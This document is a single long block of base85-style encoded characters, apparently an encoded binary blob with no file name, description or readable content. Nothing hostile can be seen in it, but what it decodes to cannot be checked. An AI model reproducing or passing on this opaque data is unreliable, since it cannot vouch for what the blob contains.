z27v2e(^gyv%eiqA5w^+Wlh$3hSM$SQ#b&UyOX{(;q~9##K>YUBa_X0RM{{2Pf|FvN zsVYXeT&bFeow+Xv|EaHwD#c++s?=q+0!&k5hNZVS`JBEgwG40Wm=F5oOk&Ux?HKzv z0Yg8*J%@NQ=GIwR<(l&SpW=$k3w|;*#DH3(c2P@kg<|t!GjEn!lyRO!y40u?YW~T3 zZP$qg`s;>3T-%xrs=^OyJT&)0rf^L#5Nb+EBexQI-D$_96*Y71n&n+*Ic>do^r)xb zgFvO^K)|LeE$ZazNi~%xWE*Uc`LIb=b97X$*+>!mlVbKNb`jBydll9ew#3Ov-GKU9 zpeP0J!YpFwb`+JoCvj$33x0JIYIVi5he_zBGWl<x6qqXKX8hJQmS*iag~}$@ktT+k z?cJ9q;>rb0mp83{QjMbC)y5f#VKr8a%t!XI54at9AjM6Kd1vaC=sOq%g~5(*Br*^Z z%oavaj#yr(rSL;cc0@mrK`o7Jod9r2x9xrPBSuho_E5on@u3Y3g(>*t!ZYh8p6C^- z_bl)+jXAb`pzT+3%0o0dO)Kh276bfSenHU<E~?`CjRi@U7<hk<x?Dr{6B^8=#Z$fS z5Eca;jZl;3{MR6Q`cjuF-y{e7K>f^jZ4G+*ML~BO9yh(haq8LuXQ>jG34p2bhEk{j z)aj{H@OD~PZoydI`Y-OBS^adjb=?gYesR+kqZw}{9n&re1Um;CkjdY==ItiG?(z82 zw~8!mkk;wmaO^%I=J6UeFwLJ$0zp9EN?rx2pMewe`_|Wh3wix^rEtyC)XlZyb3{{{ zkCQbsd3^#+2WQC}>pT?G`2fqnD(!p6yt<oJDER?fBz-0^ISbl^K+|q^o`pq7#kG?} z{&zupOn;KAq@%@BwgQ1->fhAzOtuTxa3~KPIphuq^iaq#Ba$t|`-PiU5wZ4#>;%wu zq)4$~t;o^WBoDZ!O-5NONYBQX#j$ioOp44|gWxx|vi`dFv}7Q2CxDCbF@z?=o3hB3 zW&I}0iaE_rLukf}fi%L(0@LIy!gb+N00Bbj$-4;=N?Ab^`L=I@=Ad>87->I^kCuy@ zq6=NuP=XSfnmD8Es}u`QOYqq5d8s-H5rOso+j*%zOX{*uLFb?`>DTOyep|7EEYr%| z1H2CEa40rsyzG6jSHQ4z7Dg}^V^|!T^Hdb_7RmwDcW9qLhW&48Lr*3!g5PDImGwqu z_hASk$Oxj6Vi&_h#3=)YJKLnF9uFwxOd_v%V(Ilr7y`YwM$GqvsE9(Jz8_TZm6J|x zp_4&xK7GJM_THv(l=HWZH-&zdb2-Z#{<a)mcu|`oqN;iQhNo6(&F_v|(TV=NOYT1% zUuzrwoDm>xcz<Y{UtX&*^~|9OErKN1sFu<CJqi^HwCuxu$yzh}amm^-<{kEb?`hwo zbCnDKJi2MY6MOMU6Mu4|0`!aZ4k?ICmQ@&{s0xCR?B<LjaiXkDhTt~y;T$|Ow~J3; z1&1hqdT{`=2|R<oE03_sLQ8B2JWO$y?quC(PhMOL3Ic%B21HP#x77AiP+H-!#;~x2 zSNh<iY5r^{JX9V!{6wBBCcO$5N_*d5k;gEcW+zjQ_cX1~4pzSu0Nssn(%`V>Cs1LJ zsNV;-6V##nPg9`gP#ngI_{W*jjsvvAy2z@AGa9tYxfYJ{AM`@A5^La&v2)BbM9-PI zbA8NWgeSelNmepaYrN`Je<FR->~Q6ut#4@`^r(4Ems3~388M~mYd&*_Lw+NgRZ<l= z#U|OAurKaK`7Ak31&GJ*=^RCumZ3=6G6&I7^P6Czs)v1AP~nIYA3m0%8<ab<!TkK; z7*(o*&F{V@SLQTiIo^!Vm?u&7-D#5cERDq(^GU8~&SGGQ95r>`rT~AD=PEO;9~2ew zc5I05$c>MKIo3Ku=Y9fP#WDuaUQchQll-j%{g*is%o$Dc7J!Z-_%j|eN{wOA=jdIF 
zbk>q~jeOAO^9zJcX2VEuADjFQM=?+%pKJiVmWs3ZCirB8#om9o66yH6nP<sQfr_>g z#t8%UERfVQ5L~r2GyBg|uRYjg%@TQ<b*zF^`?)IvF}`FKP>7QvY{@@wodV#@ug!(Q zO4&uziPiJ#=>U9wkjWqT#3}fKB7AT78?8|Op=Pj4iC!@b3-ZN_+YS%H-HDYawZpG6 z@oEoSC(I}j-9rK!4dG}HNcE;octn-&8#yhp2){G|L*vDSMDCHM6QAE;Y25i__@S~J zss@Z4=LUb8q;(IX`No1j0xPchh?Sp{*~cU-K%5Zp3o<OAet&w%K(nK&IN}LAT{^K% zm0+~4&>cTP`2_jj;PndaT1!ml;RA$XEJa5C8muTLiXy~<9|=K{VhT;gk@A~^>on!< z*e>r})Ch<a929%^VR}7_W%;QM!yfe8`1oggyXzJA)6b8W^K(uhPbUDDXd3%yR*bP; zqY|Dl#H#&PpFA%4lrEL7mJycyecnmAglZ_s65KIutygAeSK;>WgA<y;yc)n{TicXU z*-aTSdo8qQ^?4P0=C_Bo6dJblSTm~MreVn{UrUWJ)7LC!E6I#l4d~dB*&3#XVu~*T zLh%uicV2aqq}Es4Mk7e3K*5dZVI(?;UU;yPQxDY!enM)a3T~R`6{svz$v#D5nfv@U zxR<5@)bkc;pNb^xEfwugKA8Z{PO-}h8}XdAq$3t@h+^_!sSZvNMx}Z<+f9+xWJlxq zetJ4?C#JK$k?+CGZEy$t{y8c3<%oE6gUwEx`S5MFdpW`AiCQN+P$>6|^tJ+yHpt9! zzk`kH44if-v*Bht@!`C*Tq}7<uqA^7&PVV&+7x{TKRZJu!eD4wR)PQ!?LIhTZi4zO z$6jP6`JPEBjEYinSwAUtj-|S+BeWc8YSA4-eOVsVDTTd9;@%1efYt5ioNNg!PFk@` zcBqmk(>*}V%AY7icCZ?n?6~g;7Wm~kbPc$`Xc-Ae)IUQW-pHJ@W`xs*57UTtm<9Ox z!}+FK42H}wCF0rpTz}~yN__|&;R7c;;iofV88LlI!d>}?na3?cyAXha?e|*<+*O5v zRGOxY7pZ(gRqKv>r8=eC=t&zi^5LsO4_8vfO&evP84}Hw6y+a62Y~)hlr_@xe*ypf z;zGNOoq&f51Vlpn=Sr+6AWZ$VV1xj4YeReKss9$FOh1&TsMXDA!e1b_?vP7t$}hIn zNnz86Dx&8oCJzivJtR-}U}2r=DuN~QO>UrpYLHQ;q9Fn2v5p`qLlZ|r8iof(M@tqD z36lEub-nd;G;PKr-5-0M>(~C&^EShO?3wcCt&uSn@USZ?#zq+qdt&n_m8c2md#SR% z_#Gb(+jWuHqlB|PI_T9FD|sVjE#ciRRU$cAVM3_iN6vzCP<ZcE6+QB@HY+KmdUkNj z*B{;<fundguf>p>KF*?=e~U(#?9xt`epZ;xNB^~!D)lk8=w=PFFomR%yr3qnN?&Pd z!#61jTr>YHMW}vf=glg4P{;<zIsfG?kTHB8>hO&XR(yzrP=Ba7v@0!D%C%`^6m1Sf zKqKQIq+%v~Ud6i#bHQAsS?>T{fG0&0rvH}3X6_k`aM|@6U)ISliBnDKMx6t80h`^# z!#&r9s^k*s19t&|^i|o$e#y!gH0z9Cw`zpBBc+&k$KHjhvp2Wtc3$m(;mK+iJ6f~E z&2Bx43U{lm(_eY99CtD?oG)WYU=WTeM`G3*)_62U9#;!o7r(y8@_@USD!I8VjaoX( zNjNj=E_lMO5?Hr<chF`3c|;o3I@#ICE-)&o`>f~v95izLV#S-w7|0lRB%)j?bPzRk zaKe~^B?O2_ga1Gv)F(Ls)L^{%Df<|`C3xMbSbMxav-Id?&>n6l;}{OJbur+;gX_Z6 zVnNrk>ZCn{Iju!6hevyDMYDR-6@q8?Iw#JX+Eqt5LWl9%C;*v9t$QROb6~Rm8t(5m 
z!CB2Mk+w)A)3<2DwHtY$)DB%QmVg7(>0-CYFcx3Hud;5)<sn@G(2&}>rHSmX+c^xr z#ov93xo$2PwZY5nH?$S=V%e~of;6(DG}aZBfT~4yf5?<YTP<mfNGLDbgNw4q^xs%C zRx@L@3aQ|6Rs$FGv&Z2tM*kL4C$wfwmk5k)@93-?j_&6mo<d`n(21GzA;n0tv|KQC zhX6J*DMUVp(J@j1s2;;DYylB%4Xa_njnb2%q0pzDfpA!vMyZ=VrWsdSs2A}%Fr@C8 zys3``%4b$#RW)$Q4^m88ZCBMDrSZ!Zi{2PdgvNuv0fqHB4Dkf|F9EH{4K5iaBfBrr z1>$!Wa@?4LeE1s>o<>Rx<bt>dEPemxC*)U*MI1@YG`%SYH~<Zn2)a4Mh`<q>izv8C z62hSJNWymv*%X;67~nuv#)*!M9Xj}+ChObSu*;5xf{VU~n7n8pEs>p%#t#8=;gO?l zXU}st8ZpWo@syalh<r%1*-1gLu|(FH%kUfGvRAJmw-=adWk5-mv~FfinAKU^vRMxS zHV?9zx_~AD7%k}uplJk;*g@beoR{BJ+M@eTK(Gz|$iJ`3BR6K-g2?b2WjkexO6Lgh zkb+=AvCBY@2&p2nW9?!`i^yz{T1O#A!X-vwAG|`#IWQ*8c${MTnj+@>O8R`!auG&~ zptiRpk}(NGkDy<9w&6k*=tCLqCc=rJ7&TqI6aP{I>}n<C+9ski7s@WUIk&KXXDtpL z^cpe3m?5EITm!!(+i3^0DY3Bj^zFoE-NZSRcDpdb$tKakW-Z9>U*S^IE4@usPP&ki zGSSLWZ_jrs_FbECr)k!bI%a-0dsj+g3WSjoue{ZC3XJDZfcxx<n>PuASZh+YAg67T z7|@^tu*3<;6e1m#bD7Ybe)(9pnwRUug|nGEgvL05bU>6MXNfp106mlUJI#S4b(J}R zOq57@RxRrxCv~$j$l6V#0P}1Mah|!sZdcqk^8k`-MeEFTX2z3wQ2G1Wv{e++Rm~<_ zux=Zes?ca%VUpH03`*{Qzq4mM?&7ldNFQecUNB-Dmrr#c?6a>5-;_l&<t9On8?LOh zHE}w1njg-2w#7Kl{c!oq7Jq{&bUu4z*W}x>e}>KM6s5ZL1n0~>D`b1#>+^i11q9XM zxR6dmcv1E3EWB*K<7X2Hz9(?=_$SvazBt4`>Gwz;UrW0(^5@?Z^e7&`6?+Fhojq^> z_<gw?BqJV%_R5Z6)N5znyaW{})>YAICU$QlA{S61l3;PMuGxL`OEJIY_9(QTZjJ6p zX3V`nGT{gg37S>BqOD7oN<w!C$UmJtuym7<5UiYHzZO3qBj3Un6j~Y4AP?xeeIkEp z9p~N@ez(W`T#$k@aAa!{@1V~{yfK9W9Qs%h_qRj=D(+`Pj^`*cDc=cKUyk8=`Jf$d z7@w)__VW|q9)HXzM!n_4hhg#XP4+IltiI!^M9=ib-@I1O^d9US*keC(2YveroZxIW zuV@-k%g#NPWcw_fVZ4a~c`BB>#JyCD)78*Od6BXA%>E*ik}O_I+(2q-IeoVTe8RdI zrJw<^{mHjj1dEyZZZtnLXKL?u_J048z@vB%*Lux;&zPyb$K~l3QpBI}yBGi9bpOQc zb>~_D7kPEe-Z}C_knB*BLOgqC=q<emJTn}2+Kpl?O@AJHhBMr={pbejFlR0-9OM?{ z#Y8ylTpk<DPR|_fc7Xcv<o;O;z`6j<M!XH@0SpnIa}W6<lZjIAJy!v;LpveRDD*^G zR4rWWdoz}D9dH#exYmv{>a|$5SHVcxDUI8~DN2Y-d;RoOr<`zSptWHxqyJQhyv3|W zlEtGzLZC2s6wr#2z^JL^h$!`tWr`(@*9YSjvoh6KubZ{#h?+c%rQ>1%gf7i0rUJyq z10b+@$39RY8fPJxgkq6lTCh`2izdn36PqXpi-l>aG&d5A^vGw-`@NRxba+?Y2axQ~ 
zzWdTF7WB=fHs&j=w>A70<H(HZLz2bsPa<FO2p>cli*yL_?@@qFB$=WUrHI?Yl7=Xx ztfQ0eUWtZm&BUEDlB6sH_;ZDJcKjG}&mV{De~@y2R0hsqTYG}Sst{PH24NNmoI<ri z`pguF7|C5;|IGSgG+q~N=bF~CJ|aZLBD(<52I(T^wRN16$71OGg!H&*Rv_)c(WF@u zsOtFST}JLxV{S?=nbJU!ZMYN&xnZJO4>T>M@q>CU2yn`B#2?%Td_+h<vRE&5BddAT zdpM>|NIdGjhR0!t^CnUPPoQ%}PV%cx?wRZ@>LoR7TZyeu9cI9f@x;@Y`yL(w6RN(d zu6-uKo0iib4LbQV5j6Ggfhnlh8Xv;<b5M(cV-Z~2O}`6?25+c0ys7*uAmi`bI*;M$ zguDcry3^U_+>9#*EPdp0ZE{k*JQzQum3x<zTUTAYsXuyU=g@EFrc^r|W?H)A5?e7F zkI{$AnU_T*PHFj)t(cRPD&QEMPVufKDEj11^$3#-t%}7ob{OXyGdGIX4P}|Gtwk%6 zJSNK(16NgycEj<V#l1V5!$9i*c-s9{^nsH}>g~UireXC1>bhuc>>CZ4lcO4OUjez+ z%GX)T2z_K9Lw!g^LAGr)aPe~;MsC>?h@{KE9OZp=YH$uMVnYOJuE_i>8x#aGz;Pft zvquG$X+Fg~FZvf;F&1N!YR&G(nbA3Zt@qkLZpP3GqSlRv#9_CAqKc#}uwMfL^Mc?( zw$qcQ%0bNl2t*C3qjeusZOtSL8~Bb;o9U6|Je{VHpvoj~WOg-CZmk{+J2>nE_K&3- zODQAiUF0T18%cPa-Ev|$mDfMUG1o4@ex0V%<3c|QLDL0lekkZSw9w5tT95dK`exxp zPk9vbnk`RyCa^10moRZAFD|>$AzL5DBZ6ajA3oLqUe8Z$D|){<sC~%0HJ&-<>#E0g zGQT<xHAOi{zQOb1i*i4cPt;az$aX;%;=Pu<=B7=(Qpf(t<7L7zRh`dn(*2mF%e@Lh z)8jd`4Iey*8N11=t?>(VAt;1?Qg$Hp&hVwKr4kg@VgE!qlvnB}ATF!ONhivcno>s@ z6~dSYfLU?GPgtR_Wy`6n<risg`01Z6Kj3%Zs+d3McSssnmR!$w@0z<Fx^(r#UVZK4 zqg#k%LRc*V(*s$lKUWigZGbjC-OQmZoeS~8tBSBu!zUu}sYByfn4+v67U{9#!G5>d z%_23fShv1PKP*TSd)sw$o(=GsLtgss-mm}(Ko8dx{)L==l_Lwzrg%%+NUa|ra2Cu^ zCGmFhmS^z_%zx-)a0V9dL;$^2$YJJU05ub}5Le>*Nz7jrCm<r|^1NJTS-`jFSvyH% zD9@m5=a$)LJa}h4rM?KkiV_tCWYP2hO*6x`>wH+ug9Cg+twpM@Mf!_0F37p>m)*cJ zKt#PGR>mQ3K!%C1F;n7Ue(h+Y!T_f=_PsofTE)2@FHcj*2()EBgH5=&CQrpj4tk@o z#cJk8BpSezG)9^<rb6!GhY@c}+yG6oDtdSt{QZ3$C_c86gg4tO3#3y%uq$E#bFm04 zxwCMbMMg<{qT~^S8<c||l?x6>k$$ZcP;Grz+ICmUb(bEXpva}7IWZC!P5QHepJUjy zgg*^Oey(ZiyNx8txfCpTFD{H?hnz27$vu7;=Rz9VTX_yg-L`!3Das}bSqZKODw(51 z5R7T8*dp1iCmHWi786EeZ(b=LoM9lZnS1)(?v2bLhQi##Hd{q3$n@QsENep>fcb|z zMoa<y+T?MGc?QdBwE10x3Ne)`b5fzi>>OjZ94K937&YB2j~0U{1S+RG6&<Nq+fHF$ z^i|=6#anx7MMEDqp%X*jvx(WSY?v9n%w*Wofl$@GfpVwau@g<Nb7>G-9N-DV&L5FP z4k0~T9Dv`0Y>oA2K<Jtp&V+vs<7+19D^80^QQ3G=F&@Dt=Ae=~Sd!Y+>XLcuU~aQE 
z3=Q^0)k@}Fy*^`TyOyP~$Uj1T%^Ro3(Y$cAu7dhD%dr}%zmeAn8J6^!=<Yh|f0KHM zT-|5;hDDH^*Irriw8$5x^9yUr(rg60(o#SOw(^Rs8zor0Pp$Lq;8?Ye0w4+{>_!Z8 zXN7ifOEtQvL|~aO#1J@ctL&RF&kBG0!28<mGG>B#6OXVvUuFl$JI?>%L@3ctxL_r; zdJ>DCaAoKu`U=B@w4-=k2tK_f8)eHMfM~Ns(p&1oNdMq#aaBxS5C^t8Z{55L1r}d+ zEviot!NU#VGFphHAj&Kk3RrUEEGp?FX4fx1z+-O^oe0mS>hQYx6!#eq8(Ab0_PQ8r zI!*z8v_n3h#3Bb_j5SVbGtC?x>2}MqQcKV40Hgoy`&vez?yVh^BFaujr4yf*T(Eh2 zSCikaa+!gO;#RN|ye_d^v+;5JBPlgS#88C%QDls2X;wvT7G`Ny8&DSDs{C}O)TbZ> zV}QsHpOodX6i5&<#XWZ`;`IyVncO;`=lwI{6K+~I9ysxHYfr}>^8E#KZ7^yp@vc;% zJ$ww-GC*i^D4TJS_6P4%VCkA&0AaPmNWBsKrvgs;j%==OjOpBlj$-r42H7;vS~Mb2 zRDPy*bFP9yj<wim1YnE-Oc4!un`<`{3JpC@MH(PJ;>SKcc&}e|ua7vZS>{^j19S2P zk#o?ur~cZR$fi^zP~?sCAzBD9>9>98IJl#rOQ5e?bmqPRF?OGS1+yQ^Zp1AuSGBo+ zC!j>wFgJq~vF{Ni{3#$LUZJQvr&l??G*H27m1cN<On$P23$O|sipr4alj;RCQ4@3( z%uW#<z!GkHJ2+RNNC$01y}<yw_9DuWa5TD-*Af2`$@Ys9dEiKR=XE3KhHd=_XDEJ3 zPG1oz<Ze>n<|JH-s=FdE|CwEL>cQiXGQT(@>`KY;nHi@as7GJ(BxHltaP@8dscc%+ z>H7#V)ES%4IRL5Nrjq@&^&?vD_sY-{wc-B3rP=Z>C-6x4Fyt_hcqu85fMMpUByMK* zB8^IdhFh3_&{Z+3?fu(WpC4>=*)NK+<=S@KGWeCL)JszhL6J+U@G<|(&-ag|_~4lN zbv?9;V)<r+Ud(fjN{$c=!M8G6VdJVt4Dq^+Yi=QdUVx?uOT`ulW;T1TP#8IQ08oT_ z1*_lI^(AR#`$Dd!`lY0pCuNyrNlRI|!A3@&eZWbBeva?y1z5J}y^sP*&as2kO9MEt zv>Oz`2U5hHX~I_%gHegkOuodU66*21#G^_aEY*O(*^x*`p!>%7;3*A(@TxQN<^H@I zXX@MsA0P$cM#tv|yicg;1BB;1FP=t^V{6Ri>q}mzI6{Z}?>t>iL>_nbQ3-Ff+c-!& zMUnyp5(f*?{4UvRVuv6%?t*iFE*H##v)%__5-~Q~lB`&(LWyv;SEa&Ogn1D7jQV%b zE$1Et0g~H|34>P=^6Oz`=;@FN0UksKegNZ-b%2)zpJCuJ>=Oy+E;r;X=HAPGw;Nhm zs!^M0O2@YwaY_js+F#!dABw^BBU5=ZT`Pw^yWP^q`mj+Edi10yq~`QGVr$|$WrJ#} zhN>?s)Qq`-t%ING){N2EXa`O`*$_g8rHIJcK+P>M9LA!!Bqq5OY}>*)Za7$;?ILfv zn-sHW3!`2{IuaQ3ZM`IQ<a<|c`yqI6D7+Cd#*Ncw_w-&P6LbPmeA)f632<c}70VYP zvw9XzakGB9ywWT5ZeM*O{_lBPstV8Fs@KLP1GT?ZqKUM|?SHF9kBtG4|7j#zThIT6 z{5Fe!8K}0u{}q<P+V_C`J*%^IWNx!Y1OnP800P2GB(}u{FqqmIySi3u!+N2u{z)4i znJbrX;)Fnm2|%LbH5hU0;Gvj^`Y=+=g3yH45C}9#t*31~`FSTvPe~mXOQbV6<QFOC za9W$-?Jt)`>M`m}OhqFTx#Y8VTbywz-4BZ76IWs~o1pvSzP9kIH5MWd?=gj*X0}GX 
zbHB2X4clG;4~;+?Wm?padyOpb)o_^RUczCsq1=7~(do}YaEvK?QO~^CJ!ZStzxrg& zsRmQcpJlKnoyYqoU2YOCK7!%Cs0IbcZ`833;`eex&w8<*b*K%7R|lUVK9~D!ji*L? z$8V;Q3^;G9nQU$ejr}0Mtam$!{TQQ*pBX{F>~~`TOb$a|Q1RE3HzjlLJ4^wAgkiUU zX8@>R!po>J+kp!<U6=JPrEygsdA^5u&d-FsiY^0K>X7+DwR9R~0nry}WpFd7Fy(5v z9A#qB<gohqg|a#t)+B1olF<2*lF3Cl?~HL^P0?o$spQmrb@jO5401P%@Y{+CxN;ir zbkYaF(SlfoPMCLCMf|T9;%1^E42Zn1GD5FEpY;iBl%<wcc$?RhWZ{~ZlsJ_Rtytpg z3LWUumC}}(ldc@s(<57cVd|m>g_}h591@4#ArL4~9(c&=IviP~o9g=8kLMH9&X+39 z-v+wR*+l3@d`odyjUb2c8sa+~(&GhK_~d2-JhBht--F^?7Okgy*$8AiJqA1$VAQ!) zusJatPrs8Rtoh?_k#YCp<IB;Mb$4;cZBf3XTX?bY@PWWYxja>iIz;);DYVgNHVG6$ zN>QQ7wzZgw>xZ6!Sp48OB6L_cZr?)tE$U2rd9|ds<k2JH>Y_Rn*>vflc-UEVWyw?n z*b&FyNbu(<E-~@Yw6N;Ee9(G3Xu)E_Zr<;tqolb0S+Ij29lyPWFo_-6z9RJV)BY9< zTS)@_xE!>ei_$QgDQ)FaXC5?LLnaXkZ~!k#Ul;*t=h=EZtL^?<oKMEHO}9DX!`(MD zWn<R%wBEMyoMJn{G_2LC47WUdd6jb<zy^CpVQVye@J3x;!sK{n?{XQ--6E;dRj+PW zsie)xeb^ML|Hjm+9?c1xwaGx>nW#{ipK|X4JiV>3(9B=Z?_Mu9wVfB2QDqa4mQL5d zsXM>IP>-lu7c^ZRUg$9)D^BYF9YdOcMGYS{r%&?oBwb;%d7<2k<;X{crHPInu!*pF zs>mbC5$rjS_O0CAVY*(RjOoj#6zlV&J_J3sJCknWvG`KVP{BjTr%VgSUB|&q$ue_C zb}5JyPVu#W)~XmGeMu`XN#dX-`DC7;t3E9_sz175Ta7n6^^q)t_jKt<4$zB1frQ@# zW+roGO$vkS6-h;YciFT^trIr^NM2o5j7!o=_XMv^Db6xW%1;yxi|l|d9nRSkd3(-+ zLv~2cI-3zgEaKc$rcG?w+*UXb%)T-!TU2Rka1B|{!CD((&GLcx{maRRDLvxpmlyWD z@*!Mx)JV4!yeB2A!qQKSMJg5q!i><;2s8pVXCP-(X)?Koehy|b#n`=WKuLurvMPI- z#8GH@hFW8}&XRo7o*K6GJ}_L`nMLz}8ZGxOsuyE$J(fkLQ#`Y?lGe54l9-^QiBeb^ zT&Z)ImKxbEeDj1_Ynd**duF*tB|8l3sKRf!$iXqqYIgNXrd$H|Y%lwXeASDdjqc%) z)yK9yi{S;R#%$<|Cgg2x0B^_)4@qkI3aw5f4IuG(TqHSivmM6T$7$|D=k0g#X8RHG zK*>YAm|Iq~=bsD{$+#lMCNaXWIQ_Pi%XmO|Ln%{!xugZlrn0=H+#+aa$=b4lcPV=y zdY<3XMQ(K8zs0nHW81s}VcEKZ;UgrLrC#E<m4f*~a7l-*I23*fU?cx$|Fko*?Y?z% z+B27cO+_{e@^*!#4QdV360dwS>{NTjzP3fhwoNS5wrzvj4r#%*EZRw<-lW=7x##$R z0BSGg`;{ifeF`*tl1Y;v48XMFqk(`Ne3{aj%asHbH5Uy$CV&=WmMi*&=p!d$QKRK- zwOG5*r=x{hL)X(0U?}RprUq(LH`jc?wx7(5!OI#UR`bBn=0Hz~*#b9qn7>txjT$*Z zb?Z$29gDR*35i0Bi&Cvw53PCSIyr?L&~Ae#^y?f)p2e!Tlg+IGeHR}f(mPdCnJbsb 
zltMsT4l@}QXn*@^Qvy42<n@J@@2myq*K%-3t4+7w5bUWBP^qiVUr`>6F)X>D_Ku<~ zsRMeMq1Ge(o%j>FNPjZFfL**JS}&KZ)MBoOo6<p+$8%j0?W}a+#Yr|J`#SL0)&H%= zP)jf`lkKezf4c2afHoY@U7W1l5{6Z7zIGu*v^}A+t|3kj7uKNl!)Qc7>~iJxeCbp= ziC6N}J4yQu00OGOl88dtj7dN2E}pe25DLE*do>raqe>=sj~1*!V=g;x``W$%jEGij z=$u%H&L#D`nroPouamawg`3`h&efvGC4SOmZLk(f1y(urQH(~E{m9!UdSuRH-a&Wj z$5XS<cW&?Sz&OMi<`C$S%b`Htvc`6OpF0m`-SkW}K&-=``u*>8D?5u6@jDt*Xa=(f zg>I-D<>%$A53C3ZY;N9c2V7GPIcss-<BZ5JCi!FUCM>Mf1wGmKETQtp9g?F2G6ZIW z`$hWFKilj}#S$-nwhk%Dw6d(;ddAnX(;Z>HyCm%f1XL>q8@|E^e7qKK&a>(w@+11V zPGu6_04yFQeJo6ij*B=Oz4!SPWjK#fPOTnZh5Z9KHX}s2rf#8jIGlPzT$vV_;M`?$ z0j++)=gZzuc@Woos_Iv00noiwz4O7(=q|>nwADe9=S;KDT(c2;p$R{K+#~NW`N3l< zkSwh`<=<{mJK(1Ma3P>B#bSA5YlMM;q&vJK0i>0YHx6f%OAnA8Gy8uROr~ldi6Vyx znC`0;#rE1UH_&*7e=ngFk4k}oQiAzH^$rd4xeWv90FJF0c)Qh2oKj|u?h|uex>fi< zJ9-9+VT>01j_BPaFveQ2x+Ud!?9E&&m>^!Kd@;Z5l`p+H7>m7RK&MoGoW);3)C*&M z2yj4^nV;IV%13vg+2!M$^=1gj+$(5uKZ<mx*<D<Dx$y%1KnPe(v~4Uk)!JH$3$6Dp z$e|r~R|jr&%F#`8`1-z**c~T%O)Nw2P>brL&C_{HCxiZ@AOq1j^jK*Gzj2SQ<i+W3 z<GhsO`GX^*E<-_o(9CLC&(`(fPVfBY4FKnDg5fC;CYUEzU{5VmLu9s#i0N{E;3%4P zDn7g}#L=pn6@zAZzlnZ~dRRKFjCkil-HIroU@Bn-#_FqB=!Zp)EC?zGVJOCYPf|Qs zhP9cK9F;m^JoSSOzK}&_I#E6TtdFU&l7|aU)ueoZYodBFt@Dknq#B+-!h1QN4qzj} z)SFrf+o0tYsdCZpAChLHIIbVfW(2FAJ-t?Ws5RWpJ=N2w70JlF(X#Nhc@ocCN8nii zfBD{t?^y`CeL~WVU$iP3$qTKu4OX}vlFGlK^rW)*!8XbKjx2eW#knpFZzCfJJ(YYy z3Cxunfb#wRoD#S_FaRYD_N-LU0^oqXF(yksaE-}&O!96FI(q+=6!Jz|Y<5rSEw^z_ z-Xj*=YcdaIGt3s%sKpXg+}$viyN-f{&Y3mR5Tuq?Bi<Psk7Q2vfDR<7Pr&sYdUz`x z7faO~U38>3<d^@7=a9tt#j5r592H|*dm>)^V<--{$b%VT5$Tp%InHzP4)CZOCODYu zt9=z*@vFIa?7S^9JQ;#MS=`KoMNrC>2YdnYegWXZX1Rn7LnHwRRnh1M`l6mWBOy^N z_y#n;ww@-wsJt|G29@DU+9LtLpf7b^)ZWqyQmtTJ*mO6D_D24l1tM85_EVxRXs=6! 
zpiwJ%n4Zi-7Nga|Sr^rq3DC8&<Cebxs4;1-n>LwNwr9GPP&b;g>i!J7YScP6J!<jD zS;EM<8*>;Bn~^%Ou8N9V_vzm#q2tIZSYD|&qG+nb<F6f&ZA+Ss>TcrJ!h%n!N1A32 zw#X0_r6=3p9w70gop)o8n&Q!jx~#%v-uDe#dqWbCoAm>mMMY*r0bm)B5p@k+^omLO zq;uV<TMYU(C4v;SLQ&qPx=l{H<(Wl<tkHTi_U;2u+CZ!r?$z=el?z*!ozhn^-B1zx zM@c*w-R~oebmW>5Opf-yy`+c=Q1@)$CUbA@2n5BTJY_bl@%0eBQ7@qU)E+?6WyuHP zpV~g48YI;cs!vtD0gQ7Kfy@M6!(bem-=l&*YhOVB29uVFuEiJDWef&PTH9Ujc2zI7 z8VesZQr49@_tSilmhGZ>ftkZ+HMW^Pz4@ITHm{xx{wdLnBF6{0p*ma@`gN!*&oFt* zRe4Z)Qb^hCh3t|ku1>I;HLkg-Hsmluonw4Iit}mB_e<N80^p~~JlR+Gt*WA3Zdmp( zl@Cw+)dNug!&_KWJ8r6wc^rVc8EyBi7{fb-2lhlnZ#q%Ylx$S!axWurD<bkSEb`LQ zSreMEmOIRY(Q^cYmuACtT{X^5W&Aw`b%A;ybY=|OO<LUeoH*&4pl~azv!jbhc=YjJ zZpKIw<JxM;3;-H~Spgc2Aqd|c4-Wj^E;{RreK^WRXqtsL*?FqLLDy$#wP86I=-Txg zZ#Bo#oPTzyy-(#%J0%~}>&;cHbe7fFz^o6zY-o%7teHh|;!cu_N9iVWNaO?^-C8GH z_-Q4gC$WyMjpNT)*IGbVxZMxgRZ=DKRF-Wrs@(yJ1K3H$?jTJJaIMLKoqwI&`iOk@ zB-}hmg`Ml5V6=%z9ev5ES~ws75qmwJgDtQB8?{H)E{d<`cZKbzGG7h3-uWttMg2Wj z$#G6cuBf7BbM9SAHM~=aV+KP3pGcN(=^2hYpL1Q|9*GHh=bge&{`qknmte|z@&%#3 zLvfa}I)J6=>?lDPH?HsO?$1Q3U%Z4cMYq*YZIGe9H(TSj+dQuoA2`;aQ@s!txX+C$ zvq2WI&H>TbRE_;`zC5vAAATUtEJE+BH|!uYl|?u1K{K3CthLN;J>zr%+4AeHb<jH& zig);K`<?G?F9g29oG0I|QKNQ>rU6o0AIR+=X@KHO7H>V$)Yg;tO0S%BuE>Gx3p$tl z2kahxSu~8=oTo0#Jk6PU0V%j>CZ}RiWWh(14RwZj@6p=4lz^>@ZL1_h)5NRQpZ;nb z-(G;N2S80_O%*t6q@SH3+Y2)z_JmV1kMFU1v`is7$0OfncJ*^52C4NcM)QWrL+^1M z7;txY+~rc3tX%*cM<u!cTgcUD2MGW7f6&KoNdFqpA)x<?ZlJn}BGyoVfI`WEfN=jL z@~DYSp|}7k5aB)`-~?$AAYgL7U*tw8Nkq&A!_qFGq>1TVhy((Wh<;5goI1|B+cukR z8uV=_;*r(6`ztjY%{@B0+a2eH&6`&`_Wneto-<qR>CzDOE56rTt}|bsJzu@I?WT$X z;6`B=G(sR>)eK(;!@Lkb)nl*G_x<1d`v|+A^N;`#pG6E`w!5<spZmcPU#vG@0&v6O zHur|hi;`!jri7niy|~Xq;U<1ZgU4JID?L<0%n!FDOkyz1I(pz%sI7<u^ul~+3CGEP z?wnoEOOyuGH<60=v=6t%<qV=r=4Hf#eq{sU26+4WVU@D+9nbzOB9ZXax5hXEY(-1q z*w28tl*us>>`+EHYT6+?>}m!|Z}Vu)5g&6r&dG6`57OGCN<uVN1B#oNKM6<zOs(AA zzH+fo1B-2>Ce3oU%q7&EaXG{8H=Np~SF?(xU&3FG6Hc{q_Y-clQ%VY1`^o8NOLXq( 